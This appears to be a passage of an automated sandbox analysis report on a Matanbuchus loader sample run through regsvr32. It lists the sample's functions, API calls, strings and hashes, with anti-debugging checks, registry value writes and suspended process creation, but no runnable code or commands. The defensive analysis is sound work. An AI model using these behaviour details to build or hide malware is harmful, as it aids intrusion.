                                                control_flow_graph 114 7ec295f0-7ec29815 115 7ec29817-7ec2984a 114->115 116 7ec2984c-7ec29853 114->116 117 7ec2986f-7ec2988b GetProcessHeap 115->117 116->117 118 7ec29855-7ec2986b 116->118 119 7ec298a0 117->119 120 7ec2988d-7ec29895 117->120 118->117 121 7ec298a7-7ec298ae 119->121 120->119 122 7ec29897-7ec2989e 120->122 123 7ec298b0-7ec298bc 121->123 124 7ec298be-7ec298c1 121->124 122->121 125 7ec298c6-7ec298d8 123->125 124->125 126 7ec298da 125->126 127 7ec298ed 125->127 128 7ec298e4-7ec298eb 126->128 129 7ec298dc-7ec298e2 126->129 130 7ec298f4-7ec298fc 127->130 128->130 129->127 129->128 131 7ec298fe-7ec29909 GetDriveTypeA 130->131 132 7ec2990c-7ec29952 130->132 131->132
                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7EC2986F
                                                • GetDriveTypeA.KERNEL32(7EC681EC), ref: 7EC29903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923
                                                • Opcode ID: 86f874f176d6dc445216474946f020efd5dcc5b1e16c16f48f2dea8c0df4eee8
                                                • Instruction ID: 1b4972bd6b94c4f0b7dac613eab679d40d4ec7850af55a44360b683315d9aebb
                                                • Opcode Fuzzy Hash: 86f874f176d6dc445216474946f020efd5dcc5b1e16c16f48f2dea8c0df4eee8
                                                • Instruction Fuzzy Hash: C2A1167AD043E8CFCB54CFAAC65079DBBB2BB49300F2481AAE559AB344D7300A45CF55

                                                Non-executed Functions

                                                Function 7EC41417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EC41423
                                                • IsDebuggerPresent.KERNEL32 ref: 7EC414EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EC41508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7EC41512
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 44a15d9ec394f624d50627555eeac2b3d4bb903d5b1a463544d590824294e0a5
                                                • Instruction ID: 8be3e751763205d68ad0f3fc467bc5045f366150a87d50c3afcdcc025933a3ab
                                                • Opcode Fuzzy Hash: 44a15d9ec394f624d50627555eeac2b3d4bb903d5b1a463544d590824294e0a5
                                                • Instruction Fuzzy Hash: 6A312979D052189BDF20DFA1C9497CDBBB8AF08300F2045EAE40DAB240E7719B84CF55
                                                Function 7EC2E1C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction ID: 18f82219f116f68ad8d63fa9ab07157868a13e5b6e2e4e44937d89251aae6f83
                                                • Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction Fuzzy Hash: F4719EB8E04259DFCB09CF99C490AAEBBB5BF48304F2081A9D915BB345C734AA41CF94
                                                Function 7EC06570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 408 7ec06570-7ec065a7 call 7ec40cc0 411 7ec065ae-7ec0662b 408->411 412 7ec06636-7ec0663a 411->412 413 7ec06672-7ec066b4 call 7ebf2020 412->413 414 7ec0663c-7ec06670 412->414 419 7ec066b6 413->419 420 7ec066bb-7ec066ce 413->420 414->412 421 7ec06843-7ec06847 419->421 422 7ec066d0-7ec066d7 420->422 423 7ec066d9 420->423 424 7ec06849-7ec06856 call 7ebf1d80 421->424 425 7ec0685b-7ec0685f 421->425 426 7ec066e0-7ec066ec 422->426 423->426 424->425 430 7ec06861-7ec0686e call 7ebf1d80 425->430 431 7ec06873-7ec06898 call 7ec120f0 425->431 428 7ec066fc-7ec06730 call 7ebf2080 426->428 429 7ec066ee-7ec066f9 426->429 440 7ec06732 428->440 441 7ec06737-7ec0673e 428->441 429->428 430->431 440->421 442 7ec06745-7ec0674c 441->442 443 7ec06752-7ec06793 call 7ec3f4d7 call 7ebf1ed0 442->443 444 7ec06835-7ec0683d 442->444 450 7ec06795 443->450 451 7ec0679a-7ec0679e 443->451 444->411 444->421 450->444 452 7ec067a0-7ec067af 451->452 453 7ec067b4-7ec067ba 451->453 452->444 454 7ec067e0-7ec06807 GetProcessHeap HeapReAlloc 453->454 455 7ec067bc-7ec067da GetProcessHeap HeapAlloc 453->455 458 7ec06809 454->458 459 7ec0680b-7ec06830 call 7ec12be0 454->459 456 7ec067dc 455->456 457 7ec067de 455->457 456->444 457->459 458->444 459->442
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                • Opcode ID: a10643f3649718233e38afe4e8c127eb8605cc2c4fbb4bf010a68fe10eb3abf7
                                                • Instruction ID: 1167013ad0e0ef2c56b2be06343d08149acf1f702f32d770cbced96156f51c9d
                                                • Opcode Fuzzy Hash: a10643f3649718233e38afe4e8c127eb8605cc2c4fbb4bf010a68fe10eb3abf7
                                                • Instruction Fuzzy Hash: 8BB135B8E08288DFEB01CFA8C894BDEBBB1BF48304F104159E945BB385D7B55A45CB61
                                                Function 7EBEC1A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EBEC27E, 7EBEC424
                                                • d, xrefs: 7EBEC2E0
                                                • d, xrefs: 7EBEC39C
                                                • d, xrefs: 7EBEC445
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EBEC283
                                                • n_chars < number_buffer.size() - 1, xrefs: 7EBEC429
                                                • @, xrefs: 7EBEC40D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                • Opcode ID: af74c10a30af731ef8fb713ab9411db1b9c74e3243293dc8c1a17d0295fed92d
                                                • Instruction ID: 58518dda44f64dc72ac03d039a7304cdb583e02d09d2dfd2c8a02ea397b7e944
                                                • Opcode Fuzzy Hash: af74c10a30af731ef8fb713ab9411db1b9c74e3243293dc8c1a17d0295fed92d
                                                • Instruction Fuzzy Hash: A6F1F278D00299DFEB14CF98C981B9DBFB2BF88304F208199D81AAB754D7746A84CF54
                                                Function 7EBEC650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                • Opcode ID: a8c398104265c3bf772700f2e24d1ae8fe19c21d5d4548246dc31a5194ad36ab
                                                • Instruction ID: b57130f0cb495ad914dfd211914239d07f319e6cf00fbce8e606d6de3eda6e66
                                                • Opcode Fuzzy Hash: a8c398104265c3bf772700f2e24d1ae8fe19c21d5d4548246dc31a5194ad36ab
                                                • Instruction Fuzzy Hash: 48E1CE78E00249DFDB15CF99C980A9EBFB2BF48304F2081AAD919AB754D7346A81CF55
                                                Function 7EC3EF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EC3EF39
                                                • wsprintfW.USER32 ref: 7EC3EF86
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EC3EFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EC3EFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EC3EFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7EC3EFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7EC3F008
                                                  • Part of subcall function 7EC3F6E7: GetTickCount.KERNEL32 ref: 7EC3F705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                • API String ID: 730945307-550109914
                                                • Opcode ID: b80285a745d760786f7694115fae4972d2b547755ca90d182f3cfa1f80b89cd8
                                                • Instruction ID: 25823cab08fac8164e060c674f7758e97ff4d817aa2cb5cd694febc2d63a69f1
                                                • Opcode Fuzzy Hash: b80285a745d760786f7694115fae4972d2b547755ca90d182f3cfa1f80b89cd8
                                                • Instruction Fuzzy Hash: C931387AA00218BBDB219A96CC89FDFBF7DEF08354F5004A5FA05E6050D770AA54DBA1
                                                Function 7EC3F11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7EC3F149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7EC3F150
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EC3F18C
                                                • wsprintfW.USER32 ref: 7EC3F21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7EC3F3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7EC3F3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                • API String ID: 3386633596-4137330559
                                                • Opcode ID: 9a74c1c85443c7af7d7a81a11d70e1a3b3c94a1fd602a8b74977fc44d44a62aa
                                                • Instruction ID: 35a9e25999ec549809f518f4600f3db0bcd3dde4ed79c56d0ed460f6527562b1
                                                • Opcode Fuzzy Hash: 9a74c1c85443c7af7d7a81a11d70e1a3b3c94a1fd602a8b74977fc44d44a62aa
                                                • Instruction Fuzzy Hash: 82813FBAD00148AFEF51DBA5CD85FEFB7BDEF04244F600865E505E6250E7319E608A62
                                                Function 7EC43BE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7EC43C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7EC43CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43D28
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 7EC43D3E
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7EC43D53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                • String ID: csm
                                                • API String ID: 1385549066-1018135373
                                                • Opcode ID: 8cecc05eae58afa2f2207a3938c5d4aa045be7bc5fd1db2644a938e98c66c2f9
                                                • Instruction ID: 99ea8ca857d1e1f95a7902fe0dfb4280880adcd5d42d6bd4179e923621ade9d0
                                                • Opcode Fuzzy Hash: 8cecc05eae58afa2f2207a3938c5d4aa045be7bc5fd1db2644a938e98c66c2f9
                                                • Instruction Fuzzy Hash: 1C41913CA002099BCF01DF6DC884A9EBFB5BF862A4F2096A5DC155F355D731D905CB91
                                                Function 7EC3C5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7EC3C78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7EC3C7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                • API String ID: 515556390-2230072418
                                                • Opcode ID: 3f5b613cf29fbc4df3f22947179cd3cd410918d8377a5b1e6d6e90e60ae3b771
                                                • Instruction ID: 4ef298afcbec640616f8437c1f62ee6be7ecf28c971de94b0666de0a5902dbcb
                                                • Opcode Fuzzy Hash: 3f5b613cf29fbc4df3f22947179cd3cd410918d8377a5b1e6d6e90e60ae3b771
                                                • Instruction Fuzzy Hash: 6CB14A7AD042A8CFDB50CFAACA4079DBBB1FF48300F20819AD559AB355D7341A85CF61
                                                Function 7EC33E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EC33F69
                                                • false, xrefs: 7EC33F6E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: ff20b99884c6ffc06efa1d32db94a93fdb5df9cfa51a52e3a3b0cb959bf6a377
                                                • Instruction ID: 6bb6c6af5871ee0da8c1abc0d03972fe0fe590fc40c412294fdc70bbb4419d0c
                                                • Opcode Fuzzy Hash: ff20b99884c6ffc06efa1d32db94a93fdb5df9cfa51a52e3a3b0cb959bf6a377
                                                • Instruction Fuzzy Hash: EE21537DA14208EBCB08DFE4C890DEE7BB5AF45300F24899DF9516B254DF31AA18CB55
                                                Function 7EC33D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EC33E49
                                                • false, xrefs: 7EC33E4E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 9542321ed3ec0fcd08526a04771def4a9c4e22f2958e88e1ff4b89954466956d
                                                • Instruction ID: 7fb89d1c98826cadf2903296f0cb948ab06eb1e5b73ddc84f50a510af0a8df27
                                                • Opcode Fuzzy Hash: 9542321ed3ec0fcd08526a04771def4a9c4e22f2958e88e1ff4b89954466956d
                                                • Instruction Fuzzy Hash: EE21837DA04208EBCB04CFA4C890DEE7BB5AF55700F14895DF5516B244DF31AA18CB15
                                                Function 7EC5402E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7EC5413B,7EC51108,0000000C,7EC652A0,00000000,00000000,?,7EC54388,00000021,FlsSetValue,7EC6D860,7EC6D868,7EC652A0), ref: 7EC540EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: 66cd1688fdd42581c30d8f00b080e254c9bbfa06fb6aed8a190207dda094443d
                                                • Instruction ID: 5b76a766ed9ccf37299bcf73260ced4ed4b4d9e2e8cd0a43328ed089742d09fc
                                                • Opcode Fuzzy Hash: 66cd1688fdd42581c30d8f00b080e254c9bbfa06fb6aed8a190207dda094443d
                                                • Instruction Fuzzy Hash: D221DB7E911321EBC7129A638D44A4B7775BB91370B310510ED27AF388EB30DD00CAD4
                                                Function 7EC4F245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EC4F265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EC4F277
                                                • swprintf.LIBCMT ref: 7EC4F298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EC4F2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EC4F28D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                • API String ID: 2943507729-1719349581
                                                • Opcode ID: d3464c7148c1114837cd5b1efd17c55d91c41da5e46f4858c63529310e315914
                                                • Instruction ID: 211fd46407f1adb3dcb3fa4d3c6fa2109114e7999066a04267b92e4fbf26050b
                                                • Opcode Fuzzy Hash: d3464c7148c1114837cd5b1efd17c55d91c41da5e46f4858c63529310e315914
                                                • Instruction Fuzzy Hash: 3011347E9000486BCB20DF2ACD44ADF7BBDEF46210F505959F92AD7148EA30AD51CB64
                                                Function 7EC507EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FD2A3F40,7EC652A0,?,00000000,7EC63C13,000000FF,?,7EC5077A,7D83FC4D,?,7EC5074E,7EC652A0), ref: 7EC5081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EC50831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7EC63C13,000000FF,?,7EC5077A,7D83FC4D,?,7EC5074E,7EC652A0), ref: 7EC50853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 7e016a5cc2acdbac85a3851dbde46fbf8c846c382e333c5adffae73efd126af2
                                                • Instruction ID: 2114444cb0a8df20ba6100d4b916498ff7c0b3ba5704082fef143883fa0faa40
                                                • Opcode Fuzzy Hash: 7e016a5cc2acdbac85a3851dbde46fbf8c846c382e333c5adffae73efd126af2
                                                • Instruction Fuzzy Hash: 5D01843E900655AFDB118F55CD06FAF77B8FB44715F100625FC26A6380EB749800CA90
                                                Function 7EBF56A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF56C7
                                                • int.LIBCPMTD ref: 7EBF56E0
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF57BB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 7bde938905e542248c19d6b14cb94d9f1a7e9791611cf0928bf4f983ba3463f7
                                                • Instruction ID: f2a6e1f89111ad1ca8b53c83c94d5889e1a0f8f25dbc484685502da2def3fb10
                                                • Opcode Fuzzy Hash: 7bde938905e542248c19d6b14cb94d9f1a7e9791611cf0928bf4f983ba3463f7
                                                • Instruction Fuzzy Hash: 4741C4B8D04649DFCB04CF98D990AEEFBB5BF48310F208619E915A7390DB346A45CFA1
                                                Function 7EBF57E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF5807
                                                • int.LIBCPMTD ref: 7EBF5820
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF58FB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: cd49d435a2a80e14391e8d6b237a1442411a6bedcabb64b40bec74f679e47282
                                                • Instruction ID: 81b7fa568781a9a9d5a3e00f2c90c8adbe7df5c08e784876fff87a44a5562c15
                                                • Opcode Fuzzy Hash: cd49d435a2a80e14391e8d6b237a1442411a6bedcabb64b40bec74f679e47282
                                                • Instruction Fuzzy Hash: 4141C6B8D05609DFCB05DF98D980AEEBBB5FF48310F204619D915A7390DB346A45CFA1
                                                Function 7EBF5920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF5947
                                                • int.LIBCPMTD ref: 7EBF5960
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF5A3B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 301af3bddf4aa4ab407e13018f4c5010b810749a428beb3b423a0699394de324
                                                • Instruction ID: e890b4a0f0fcbf95133b224bc276d0dc13ab668273a01833179ae0c8157a593a
                                                • Opcode Fuzzy Hash: 301af3bddf4aa4ab407e13018f4c5010b810749a428beb3b423a0699394de324
                                                • Instruction Fuzzy Hash: C441C5B8D04609DFCB04DF98D980AEEBBB5BF48310F208629D915A7390D7346A45CFA1
                                                Function 7EC3FDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7EC3FDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EC3FDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EC3FE24
                                                  • Part of subcall function 7EC3FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EC3FF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7EC3FDD1
                                                • _Yarn.LIBCPMT ref: 7EC3FDE7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                • String ID:
                                                • API String ID: 1088826258-0
                                                • Opcode ID: 55e89009008a6dbdc979100c8e4b407f18368ef823855b08dea0628b3d497dcf
                                                • Instruction ID: 0fc8fb78a1a20d86c3a6c23004ad844f24afbd4d7e0a89b8a6d6b6d368f985ee
